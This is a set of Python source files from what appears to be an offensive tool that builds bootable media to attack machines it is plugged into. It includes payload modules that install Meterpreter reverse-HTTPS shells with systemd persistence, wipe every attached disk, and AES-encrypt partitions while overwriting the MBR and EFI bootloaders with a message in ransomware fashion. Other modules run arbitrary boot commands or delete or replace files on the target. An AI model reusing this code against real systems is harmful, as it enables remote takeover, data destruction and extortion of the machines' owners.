    ROOTFS_ARCHIVE_PATH = ROOTFS_ARCHIVE_BASE_PATH + ROOTFS_ARCHIVE_EXTENSION
    ROOTFS_ARCHIVE_VERSION_PATH = ROOTFS_ARCHIVE_BASE_PATH + \
        ROOTFS_ARCHIVE_EXTENSION + ".version"



"""
Run a command or executable on boot, the executable must exist on the host filesystem.
If you want to run an executable that is locally available. Use run_executable.
It finds the executable and copies it onto the host filesystem.
"""
from snr.core.payload.payload import Context, Payload
from snr.core.util import common_utils


class RunCommandPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Any",)
    INPUTS = (
        ("COMMANDS", [], -1, "Command to run", True),
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        assert isinstance(variables["COMMANDS"], list)
        with common_utils.rootfs_open(ctx, "root/payload.sh", "w", encoding="utf-8") as stream:
            stream.write("#!/bin/bash\n")
            for command in variables["COMMANDS"]:
                stream.write(command)
                stream.write("\n")
        self.add_autorun(ctx, "root/payload.sh")
        return 0


payload = RunCommandPayload()



#!/usr/bin/python3
"""
Meterpreter payload
"""
from snr.core.payload import context, entry_point, storage
from snr.core.util import common_utils
from snr.core.util.payloads import systemd_service

LINUX_SERVICE_NAME = "@LINUX_SERVICE_NAME@"
LINUX_SERVICE_DESCRIPTION = "@LINUX_SERVICE_DESCRIPTION@"
PASSPHRASES = "@PASSPHRASES@"


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("Meterpreter payload started")
    for part in storage.query_all_partitions(block_info):
        if storage.get_partition_root(part, block_info) == our_device:
            continue
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            ctx = context.require_context_for_mount_point(
                mounted_part.mount_point)
            # Try to see if we are dealing with any sort of Linux
            if (mounted_part.exists("usr/sbin/init") or mounted_part.exists("usr/bin/init")) \
                    and mounted_part.exists("etc/shadow"):
                mounted_part.mkdir(f"usr/lib/libexec/{LINUX_SERVICE_NAME}/")
                mounted_part.copy(
                    "data/linux", f"usr/lib/libexec/{LINUX_SERVICE_NAME}/{LINUX_SERVICE_NAME}")
                with mounted_part.open(f"usr/lib/libexec/{LINUX_SERVICE_NAME}/control", "w",
                                       encoding="utf-8") as stream:
                    stream.write("#!/bin/bash\n")
                    stream.write("echo Action failed\n")
                    stream.write("exit 12\n")
                service = systemd_service.SystemdService(
                    ctx, LINUX_SERVICE_NAME)
                service.Unit_section["Description"] = LINUX_SERVICE_DESCRIPTION
                service.Unit_section["After"] = "network-online.target"
                service.Service_section[
                    "ExecStart"] = f"/usr/lib/libexec/{LINUX_SERVICE_NAME}/{LINUX_SERVICE_NAME}"
                service.Service_section["Type"] = "simple"
                service.Service_section[
                    "ExecRestart"] = f"usr/lib/libexec/{LINUX_SERVICE_NAME}/control restart"
                service.Service_section["ExecStop"] = f"usr/lib/libexec/{LINUX_SERVICE_NAME}/control stop"
                service.Install_section["WantedBy"] = "multi-user.target"
                service.write(False, False)
                mounted_part.link(f"/usr/lib/systemd/system/{LINUX_SERVICE_NAME}.service",
                                  f"/usr/lib/systemd/system/multi-user.target.wants/{LINUX_SERVICE_NAME}.service")
            else:
                common_utils.print_warning("Unknown operating system!")

    common_utils.print_ok("Meterpreter payload completed")



#!/usr/bin/python3
"""
Wipe_disks payload
"""
import random

from snr.core.payload import entry_point, storage
from snr.core.util import common_utils

WIPE_MODE = "@WIPE_MODE@"
MODE_E_RANDOM_PASSES = 5


def pass_zero(path: str, kbs: int) -> None:
    with open(path, "wb") as stream:
        for _ in range(kbs):
            stream.write(b'\0' * 1024)
            stream.flush()


def pass_ff(path: str, kbs: int) -> None:
    with open(path, "wb") as stream:
        for _ in range(kbs):
            stream.write(b'\xFF' * 1024)
            stream.flush()


def pass_random(path: str, kbs: int) -> None:
    with open(path, "wb") as stream:
        for _ in range(kbs):
            stream.write(random.randbytes(1024))
            stream.flush()


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("Wipe_disks payload started")
    wipe_level = ord(WIPE_MODE) - ord("A")

    for block in block_info:
        if block != our_device and not block.is_rom():
            common_utils.print_info(f"Targeting {block.path}")
            # Level 0: All levels have this
            # No matter the mode, we must override the partition table header and filesystem header
            for child in block.children:
                common_utils.print_info(
                    f"Wiping filesystem info on {child.path}")
                pass_zero(child.path, 1024)
            common_utils.print_info(f"Wiping partition table on {block.path}")
            pass_zero(block.path, 1024)
            if wipe_level >= 1:
                common_utils.print_info(f"Doing a zero pass on {block.path}")
                pass_zero(block.path, block.size // 1024)
            if wipe_level >= 2:
                common_utils.print_info(f"Doing a 0xFF pass on {block.path}")
                pass_ff(block.path, block.size // 1024)
            if wipe_level >= 3:
                common_utils.print_info(f"Doing a random pass on {block.path}")
                pass_random(block.path, block.size // 1024)
            if wipe_level >= 4:
                for _ in range(MODE_E_RANDOM_PASSES-1):
                    common_utils.print_info(
                        f"Doing a random pass on {block.path}")
                    pass_random(block.path, block.size // 1024)
    common_utils.print_ok("Wipe_disks payload completed")


if __name__ == "__main__":
    main()



"""
Infect with Meterpreter. Note that it uses Metasploit itself.
"""
import random
import string

from snr.core.payload.payload import Context, Payload
from snr.core.util import common_utils, programs

msfvenom = programs.program_wrapper_factory("msfvenom")


class AccountHashesPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("GNU/Linux",)
    INPUTS = (
        ("ENCODER", "x86/shikata_ga_nai", -1, "Encoder to use for x86"),
        ("LINUX_SERVICE_NAME", "", -1,
         "Name of the persistance service for Linux", True),
        ("LINUX_SERVICE_DESCRIPTION", "", -1,
         "Description of the persistance service for Linux", True),
        ("LHOST", "", -1, "Local host (Listener address)", True),
        ("LPORT", 8443, -1, "Local port (Listener port)"),
        ("LURL", "", -1, "Local HTTP address, if left empty will be generated randomly"),
        ("PASSPHRASES", [], -1, "Passphrases to try for LUKS-encrypted partitions"),
    )

    WINDOWS_PAYLOAD = "payload/windows/meterpreter_reverse_https"
    LINUX_PAYLOAD = "payload/linux/x86/meterpreter_reverse_https"
    LURL_LEN = 16

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        assert isinstance(variables['ENCODER'], str)
        assert isinstance(variables['LHOST'], str)
        assert isinstance(variables['LPORT'], str)
        assert isinstance(variables['LURL'], str)
        if len(variables['LURL']) == 0:
            variables['LURL'] = "".join(random.sample(
                string.ascii_letters, k=self.LURL_LEN))
            common_utils.print_warning(
                f"Random LURL generated! Set LURL to {variables['LURL']} on the listener")
        for payload_name, platform in ((self.WINDOWS_PAYLOAD, "windows"), (self.LINUX_PAYLOAD, "linux")):
            msfvenom().invoke_and_wait(None,
                                       f"LHOST={variables['LHOST']}",
                                       f"LPORT={variables['LPORT']}",
                                       f"LURL={variables['LURL']}",
                                       options={
                                           "payload": payload_name,
                                           "encoder": variables['ENCODER'],
                                           "output": platform
                                       })
            ctx.mkdir("root/data")
            self.copy_root_to_root(ctx, __file__, platform, f"data/{platform}")
        self.format_payload_and_write(ctx, variables)
        self.add_autorun(ctx)
        return 0


payload = AccountHashesPayload()



"""
Partition the host device
"""
import os.path
import time

from snr.core.core import context
from snr.core.payload_generation import common
from snr.core.util import common_utils, programs

__all__ = (
    "partition_host",
)


def partition_host(ctx: context.Context) -> bool:
    """Create partitions on the block device

    Args:
        ctx: Context

    Returns:
        Whatever operation was successful or not
    """
    common_utils.print_debug("Partitioning target")
    common_utils.print_debug("Clearing partition data on disk")
    use_sudo = False
    if not os.access(ctx.original_target, os.W_OK):
        use_sudo = True
    errorcode = programs.Sgdisk(
        sudo=use_sudo,
        stdout=programs.PIPE,
        stderr=programs.STDOUT).invoke_and_wait(None, "-z", ctx.original_target)
    if errorcode != 0:
        return common.clean_and_exit(ctx, "Partitioning failed")
    common_utils.print_debug("Partitioning disk")
    sgdisk_options: dict[str, str] = {}
    for index, part_info in enumerate((
        ("+1M", "1:ef02", "BIOS Boot"),
        ("+128M", "2:ef00", "ESP"),
        ("-0", "3:8300", "Rootfs")
    )):
        size, typecode, name = part_info
        common_utils.print_debug(f"Creating a partition for {name}")
        sgdisk_options.clear()
        sgdisk_options["new"] = f"{index+1}::{size}"
        sgdisk_options["typecode"] = typecode
        sgdisk_options["change-name"] = name
        sgdisk = programs.Sgdisk(
            sudo=use_sudo,
            stdout=programs.PIPE,
            stderr=programs.STDOUT)

        errorcode = sgdisk.invoke_and_wait(
            None, ctx.original_target, options=sgdisk_options)
        if errorcode != 0:
            assert sgdisk.stdout is not None
            common_utils.print_debug(
                f"Command's output: {sgdisk.stdout.read()}")
            return common.clean_and_exit(ctx, "Partitioning failed")
    part_prefix = ""
    if not ctx.is_device:
        common_utils.print_debug(
            "Original target is not a device, mounting it on loop")
        part_prefix = "p"
        # Setup a loop, we need proper partition access
        losetup = programs.Losetup(
            sudo=not common.is_user_disk_admin(),
            stdout=programs.PIPE,
            stderr=programs.STDOUT)
        errorcode = losetup.invoke_and_wait(None, ctx.device_name,
                                            options={
                                                "find": None,
                                                "show": None,
                                                "partscan": None})
        assert losetup.stdout is not None
        if errorcode != 0:
            common_utils.print_debug(
                f"Command's output: {losetup.stdout.read()}")
            return common.clean_and_exit(ctx, "Partitioning failed")
        ctx.device_name = losetup.stdout.read().strip().strip("\n")
    elif ctx.device_name.startswith("nvme"):
        part_prefix = "p"
    common_utils.print_debug("Giving kernel time to discover the partitions")
    time.sleep(1)
    common_utils.print_debug("Checking if all partitions exist")
    ctx.to_level_2(part_prefix)
    for i in range(1, 4):
        if not os.path.exists(ctx.construct_partition_path(i)):
            common_utils.print_debug(
                f"Partition {i} not found! ({ctx.construct_partition_path(i)})")
            return common.clean_and_exit(ctx, "Partitioning failed", True)
    return True



"""
Clean interface to group entries and a few utility functions
"""
import copy
import os.path

__all__ = (
    "UnixGroupEntry", "parse_unix_group_line",
    "parse_unix_group_file", "format_unix_group_line",
    "format_unix_group_file"
)


class UnixGroupEntry:  # pylint: disable=too-few-public-methods
    """A group entry

    Attributes:
        group_name: Name of the group
        password: Password of the group
        gid: ID of the group
        user_list: List of users in the group
    """
    group_name: str
    password: str
    gid: int
    user_list: list[str]

    def __init__(self, group_name: str, password: str,
                 gid: int, user_list: list[str]):
        self.group_name = group_name
        self.password = password
        self.gid = gid
        self.user_list = copy.deepcopy(user_list)

    def __str__(self) -> str:
        return f"{self.group_name}:{self.password}:{self.gid}:{','.join(self.user_list)}"


def parse_unix_group_line(line: str) -> UnixGroupEntry:
    """Parse a group line and return a UnixGroupEntry

    Args:
        line The line to parse.

    Returns:
        The parsed UnixGroupEntry
    """
    group_name, password, gid, user_list_raw = line.split(":", 4)
    user_list = user_list_raw.split(",")
    return UnixGroupEntry(group_name, password, int(gid), user_list)


def parse_unix_group_file(root: str = "/") -> list[UnixGroupEntry]:
    """Parse the group file and return list of group objects

    Args:
        root: root of the directory to look for group file

    Returns:
        list of group objects
    """
    group_file = os.path.join(root, "etc", "group")
    groups = []
    with open(group_file, encoding="utf-8") as stream:
        for line in stream.readlines():
            if len(line.strip()) != 0:
                groups.append(parse_unix_group_line(line))
    return groups


def format_unix_group_line(group: UnixGroupEntry) -> str:
    """Format a UnixGroupEntry for use in /etc/group.

    Args:
        group The UnixGroupEntry to format.

    Returns:
        The formatted string representation of the UnixGroupEntry
    """
    return str(group)


def format_unix_group_file(groups: list[UnixGroupEntry]) -> str:
    """Format a list of group objects for use in /etc/shadow.

    Args:
        groups: list of groups to format

    Returns:
        string with formatted group file
    """
    output = ""
    for group in groups:
        output += str(group) + "\n"
    return output



"""
Wrap a program to be executed inside a chroot environment
"""
from typing import Callable

from snr.core.core import context
from snr.core.util import program_wrapper
from snr.core.util.program_wrapper import (DEVNULL, PIPE, STDOUT,
                                           SubprocessError)

__all__ = (
    "DEVNULL", "PIPE",
    "STDOUT", "SubprocessError",
    "chroot_program_wrapper_factory",
)


def chroot_program_wrapper_factory(program_name: str) \
        -> Callable[[context.Context], type[program_wrapper.ProgramWrapperBase]]:
    """Factory function for ProgramWrapperBase that uses the chroot

    Args:
        program_name: Name of the program to wrap

    Returns:
        A callable function that should be called with just the context,
        and it returns a ChrootProgramWrapper instance wrapping
        the passed program at the passed context
    """
    def inner_factory(ctx: context.Context) -> type[program_wrapper.ProgramWrapperBase]:
        class CustomProgramWrapper(program_wrapper.ProgramWrapperBase,
                                   interpreter=("chroot", ctx.root_directory),
                                   program=program_name):
            """Wrap {0} inside a real chroot context"""
        class_name = f"{program_name.title()}ChrootWrapper"
        class_name = class_name.replace("-", "").replace("_", "")
        CustomProgramWrapper.__name__ = class_name
        assert CustomProgramWrapper.__doc__ is not None
        CustomProgramWrapper.__doc__ = CustomProgramWrapper.__doc__.format(
            program_name)
        return CustomProgramWrapper
    inner_factory.__name__ = program_name.lower().replace("-", "_") + "_factory"
    return inner_factory



"""
Module containing a class providing systemd target file support
"""

from snr.core.util.payloads import systemd_unit
from snr.core.util.payloads.systemd_unit import \
    SYSTEMD_SYSTEM_PATH

__all__ = (
    "SYSTEMD_SYSTEM_PATH", "SystemdTarget"
)


class SystemdTarget(systemd_unit.SystemdUnit, suffix=".target", extra_sections=()):
    """Provide systemd target file support
    """



"""
Manipulate files on disk
FILES must be in this format:
    <pattern to find file>:<action>:<action args>;<pattern to find file>:<action>:<action args>;...
    All actions but replace_online support directories as well
    Actions are (case insensitive):
        delete:
            Delete files or directories
            <pattern to find file>:delete:
            Example:
                Delete a single file:
                    /home/user/info.txt:delete:
                Delete all files matched by pattern:
                    /home/user/*.txt:delete:
        replace:
            Replaces target file with a file from your machine
            <pattern to find file>:replace:<file to replace with>
            Example:
                Replace a single file:
                    /home/user/info.txt:replace:new_info.txt
                Replace all files matched by pattern:
                    /home/user/*.txt:replace:new_info.txt
        replace_local:
            Replaces target file with a file from the target machine
            <pattern to find file>:replace_local:<local file to replace with>
            Example:
                Replace a single file:
                    /home/user/info.txt:replace:/home/user2/info.txt
                Replace all files matched by pattern:
                    /home/user/*.txt:replace:/home/user2/bad_info.txt
            
        replace_online:
            Replaces target file with a file from the internet. Note that only files served over http or https are supported.
            <pattern to find file>:replace_online:<URL>
            Example:
                Replace a single file:
                    /home/user/info.txt:replace_online:https://example.com/my_info.txt
                Replace all files matched by pattern:
                    /home/user/*.txt:replace_online:https://example.com/my_info.txt
            
"""
import os
import pathlib
import shutil
import urllib.parse

from snr.core.payload.payload import Context, Payload
from snr.core.util import download


class FilesPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Microsoft Windows", "GNU/Linux")
    INPUTS = (
        ("FILES", [], -1, "Files to change", True),
        ("PASSPHRASES", [], -1, "Passphrases to try for LUKS-encrypted partitions"),
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        # We need to do some processing of the FILES before passing it to the payload
        # Delete and replace_local actions require no processing,
        # but replace requires some copying and replace_online some downloading
        self.format_payload_and_write(ctx, variables)
        assert isinstance(variables["FILES"], list)
        files: list[str] = variables["FILES"]
        processed_files: list[str] = []
        counter = 0
        data_dir = ctx.join("root", "data")
        os.makedirs(data_dir)
        for file in files:
            pattern, action, arg = file.split(":", maxsplit=2)
            action.lower()
            match action:
                case "delete":
                    processed_files.append(":".join([pattern, action, arg]))
                case "replace_local":
                    processed_files.append(":".join([pattern, action, arg]))
                case "replace":
                    # Copy the file to the host filesystem and rewrite the arg
                    new_arg = str(counter) + pathlib.Path(arg).suffix
                    if os.path.isdir(arg):
                        shutil.copytree(arg, os.path.join(data_dir, new_arg))
                    else:
                        shutil.copy(arg, os.path.join(data_dir, new_arg))
                    counter += 1
                    processed_files.append(
                        ":".join([pattern, action, os.path.join("data", new_arg)]))
                case "replace_online":
                    new_arg = str(
                        counter) + pathlib.Path(urllib.parse.urlparse(arg).path).suffix
                    download.download(arg, os.path.join(data_dir, new_arg))
                    processed_files.append(
                        ":".join([pattern, "replace", os.path.join("data", new_arg)]))
        self.add_autorun(ctx)
        return 0


payload = FilesPayload()



#!/usr/bin/python3
"""
Disk_encryption payload
"""
from Crypto.Cipher import AES

from snr.core.payload import entry_point, storage
from snr.core.util import common_utils

KEY = "@KEY@".encode()
IV = "@IV@".encode()
MESSAGE = "@MESSAGE@"


def encrypt_device(info: storage.BlockInfo) -> None:
    common_utils.print_info(
        f"Encrypting {info.uuid}... (0/{info.size})", end="")
    aes = AES.new(KEY, AES.MODE_CBC, IV)
    with open(info.path, "r+b") as stream:
        encrypted_size = 0
        while encrypted_size < info.size:
            data = aes.encrypt(stream.read(AES.block_size))
            stream.seek(encrypted_size)
            stream.write(data)
            encrypted_size += AES.block_size
            common_utils.print_info(
                f"\rEncrypting {info.uuid}... ({encrypted_size}/{info.size})", end="")
    common_utils.print_info(
        f"\rEncrypting {info.uuid}... ({encrypted_size}/{info.size}: Done)")


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup(no_lvm=True)
    common_utils.print_info("Disk_encryption payload started")
    with open("/root/bios_disk_encryption_message.bin", "rb") as stream:
        bios_payload = stream.read()

    for device in block_info:
        if device != our_device:
            for child in device.children:
                try:
                    with storage.mount_partition(child.path, no_luks=True) as mounted_part:
                        if mounted_part.exists("efi") and len(mounted_part.listdir("efi")) != 0:
                            if not mounted_part.exists("boot") and not mounted_part.exists("Windows"):
                                common_utils.print_info("Installing to ESP")
                                mounted_part.rmtree("efi", ignore_errors=True)
                                mounted_part.rmtree("EFI", ignore_errors=True)
                                mounted_part.makedirs("EFI/BOOT")
                                mounted_part.copy(
                                    "/root/BOOTX64.EFI", "efi/BOOT/BOOTX64.EFI")
                                with mounted_part.open("EFI/BOOT/message.txt", "w",
                                                       encoding="utf-8") as stream:
                                    stream.write(MESSAGE)
                                mounted_part.mkdir("EFI/Microsoft")
                                mounted_part.copy(
                                    "/root/BOOTX64.EFI", "EFI/Microsoft/BOOTMGFW.EFI")
                                with mounted_part.open("EFI/Microsoft/message.txt", "w",
                                                       encoding="utf-8") as stream:
                                    stream.write(MESSAGE)
                                continue
                except RuntimeError:
                    pass
                # Not the ESP
                encrypt_device(child)
            # Now device, not partition
            # Overwrite MBR bootstrap area
            # But not the whole MBR for two reason:
            # 1. If there is going to be a recovery, this saves the partition table
            # 2. Help with EFI boot if it is a UEFI device
            with open(device.path, "r+b") as stream:
                stream.write(bios_payload)
                # Mark it bootable, as the original flag is now encrypted
                stream.seek(510)
                stream.write(b"\x55\xAA")

    common_utils.print_ok("Disk_encryption payload completed")


if __name__ == "__main__":
    main()



"""
ChrootProgramWrapper derivatives for common tools
"""

from snr.core.util.chroot_program_wrapper import (
    DEVNULL, PIPE, STDOUT, SubprocessError, chroot_program_wrapper_factory)

__all__ = (
    "DEVNULL", "PIPE",
    "STDOUT", "SubprocessError",
    "chroot_program_wrapper_factory",
    "update_initramfs_factory", "update_grub_factory",
    "passwd_factory", "grub_install_factory",
    "apt_get_factory", "chown_factory"
)

update_initramfs_factory = chroot_program_wrapper_factory("update-initramfs")
update_grub_factory = chroot_program_wrapper_factory("update-grub")
passwd_factory = chroot_program_wrapper_factory("passwd")
grub_install_factory = chroot_program_wrapper_factory("grub-install")
apt_get_factory = chroot_program_wrapper_factory("apt-get")
chown_factory = chroot_program_wrapper_factory("chown")
